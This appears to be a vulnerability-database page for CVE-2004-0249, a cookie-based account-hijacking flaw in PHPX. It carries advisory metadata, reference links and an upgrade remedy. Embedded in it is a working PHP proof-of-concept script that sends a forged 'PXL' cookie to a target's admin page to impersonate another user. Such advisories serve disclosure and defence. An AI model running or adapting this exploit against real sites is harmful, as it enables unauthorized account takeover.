CVE-2004-0249
CVSS 10.0
Published: 2004-11-23 00:00:00
Last revised: 2016-10-17 22:42:25

[Original] PHPX 2.0 through 3.2.4 allows remote attackers to gain access to other accounts by modifying the cookie's PXL variable to reference another userID.


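[CNNVD] PHPX Multiple Vulnerabilities (CNNVD-200411-143)

        PHPX versions 2.0 through 3.2.4 contain a vulnerability. A remote attacker can gain access to other accounts by modifying the cookie's PXL variable to reference another userID.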

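- CVSS (Base Score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

Product and version information (CPE) is not currently available

- OVAL (Technical Details for Detection)

No related OVAL definitions found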

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0249
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0249
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-143
(Official data source) CNNVD

- Other Links and Resources

http://archives.neohapsis.com/archives/bugtraq/2004-03/0154.html
(UNKNOWN)  BUGTRAQ  20040316 PHPX 2.x - 3.2.4
http://marc.info/?l=bugtraq&m=107586932324901&w=2
(UNKNOWN)  BUGTRAQ  20040203 Multiple Vulnerabilities in PHPX
http://www.securityfocus.com/bid/9569
(VENDOR_ADVISORY)  BID  9569
http://xforce.iss.net/xforce/xfdb/15052
(VENDOR_ADVISORY)  XF  phpx-cookie-account-hijacking(15052)
http://xforce.iss.net/xforce/xfdb/15512
(UNKNOWN)  XF  phpx-session-hijack(15512)

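- Vulnerability Information

PHPX Multiple Vulnerabilities
Critical  Input validation
2004-11-23 00:00:00 2005-10-20 00:00:00
Remote
        PHPX versions 2.0 through 3.2.4 contain a vulnerability. A remote attacker can gain access to other accounts by modifying the cookie's PXL variable to reference another userID.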

- Advisories and Patches

        These issues are addressed in PHPX 3.2.4.
        PHPX PHPX 3.2.3
        

- Vulnerability Information (23644)

PHPX 3.2.3 Multiple Vulnerabilities (EDBID:23644)
php webapps
2004-02-03 Verified
0 Manuel López
N/A
source: http://www.securityfocus.com/bid/9569/info

Multiple vulnerabilities were reported in PHPX. The specific issues include cross-site scripting, HTML injection and account hijacking via specially crafted cookies.

These issues were reported to exist in PHPX 3.2.3. Earlier versions are also likely affected.

<?php
/* Proof of concept for exploiting PHPX 3.2.4 (http://www.phpx.org) */
/* Quick hack, not really an effective tool, only useful as a demonstration */
/* Written by HelloWorld - Ryan Wray */

/* Usage: php -q exploit_file.php <host> <port> <admin_folder_location> */
function usage()
{
    echo "Usage request";
}

function bytes_left($fp)
{
    $status=socket_get_status($fp);
    if($status['unread_bytes'] > 0) { return true; }
    return false;
}
print_r($_SERVER['argv']);
if($_SERVER['argc'] != 4)
{
    exit(usage());
}

// Attempt to connect to host.
$fp=@fsockopen($_SERVER['argv'][1],$_SERVER['argv'][2]);

if(!$fp)
{
    exit('Could not connect to host: '.$_SERVER['argv'][1].':'.$_SERVER['argv'][2]);
}

else
{
    fputs($fp,"GET ".$_SERVER['argv'][3]."index.php HTTP/1.1\r\n");
    fputs($fp,"Host: ".$_SERVER['argv'][1]."\r\n");
    fputs($fp,"Cookie: PXL=2\r\n\r\n");
}
// Start accepting data, otherwise socket_get_status will say there are 0 unread bytes.
echo fgets($fp,1024);
// While we can read.
while(bytes_left($fp))
{
    echo fgets($fp,1024);
}
// Close the socket.
fclose($fp);
?>		

- Vulnerability Information

15661
PHPX Cookie PXL Value Modification Account Hijacking
Remote / Network Access Authentication Management, Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

PHPX contains a flaw that may allow a malicious user to hijack other accounts. The issue is triggered when an attacker modifies the cookie's PXL value and submits it to the site. This can be used to hijack arbitrary accounts including the administrative account.

- Timeline

2004-02-03 Unknown
Unknown Unknown

- Solution

Upgrade to version 3.2.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related References

- Vulnerability Author

 

 
